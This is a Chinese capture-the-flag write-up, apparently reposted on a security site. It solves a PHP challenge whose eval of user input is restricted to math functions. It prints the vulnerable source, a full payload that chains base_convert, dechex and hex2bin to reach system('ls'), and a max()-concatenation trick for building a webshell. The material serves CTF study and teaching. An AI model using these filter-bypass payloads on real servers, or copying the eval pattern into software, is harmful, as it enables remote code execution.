数学函数利用链

admin
admin
admin
138906
文章
114
评论
2023年1月8日02:51:50评论23 views字数 2114阅读7分2秒阅读模式

简单的CTF题

源码

 <?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ''t''r''n',''', '"', '`', '[', ']'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_x7f-xff][a-zA-Z_0-9x7f-xff]*/', $content$used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func$whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

分析

其实这代码看起来很长,简单来说就是首先传入的参数不能超过80,然后不能有blacklist里的标点符号,然后是只能用给的数学函数,然后最后会被eval执行。 在这里的话,思路是使用base_conver()这个函数,这个函数允许传入三个参数,第一个待转换的数值,第二个是数值的进制,第三个是要进行转换的进制。这里如果输入的是字符串

数学函数利用链然后进行36进制的转换,还是字符串。

数学函数利用链那这里我们就可以构造出PHPinfo()了 base_convert(55490343972,10,36)();

数学函数利用链接下来我们想构造system('ls')这样的语句来执行,但是'被过滤而'无法进行进制转换。那我们只能换个思路,比如通过ascii码来进行绕过,而hex2bin就可以把hex值转换为ascii码。但是问题是,hex2bin并不是白名单给的函数,那怎么办呢,我们可以通过上面的方式直接去构造这个函数。如下。

数学函数利用链接着的问题是,如果都通过这种方式来构造',那么长度铁定超过80,所以接着我们得换个思路,通过传入$_GET来进行传参。那我们可以通过dechex来把_GET转化为hex然后通过hex2bin再变成ascii。这里的dechex是_GET通过url全编码后再转为10进制得出来的。

数学函数利用链这时候如果我们直接传数值给1还是不行的,因为我们传入的是字符串,如果需要让其执行则必须通过动态调用的方式,就是多加个()。所以构造最后的
payload。 ?c=$cos=base_convert(37907361743,10,36)(dechex(1598506324));($$cos){1}(($$cos{2}))&1=system&2=ls 数学函数利用链

小tip

这个数学函数构造的payload,居然可以绕过那么多东西,我突然想,是不是也可以用来写shell,所以就随便想了一条,估计之前也有人想过。

$a[]='sys';
$b[]='tem';
$c[]=max($a).max($b);
$d=max($c);
$d('dir');

当然我还是写的很简陋的,这里可以用多次max或者min去进行拼接绕过。

原文始发于微信公众号(珠天PearlSky):数学函数利用链

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日02:51:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   数学函数利用链https://cn-sec.com/archives/1443718.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息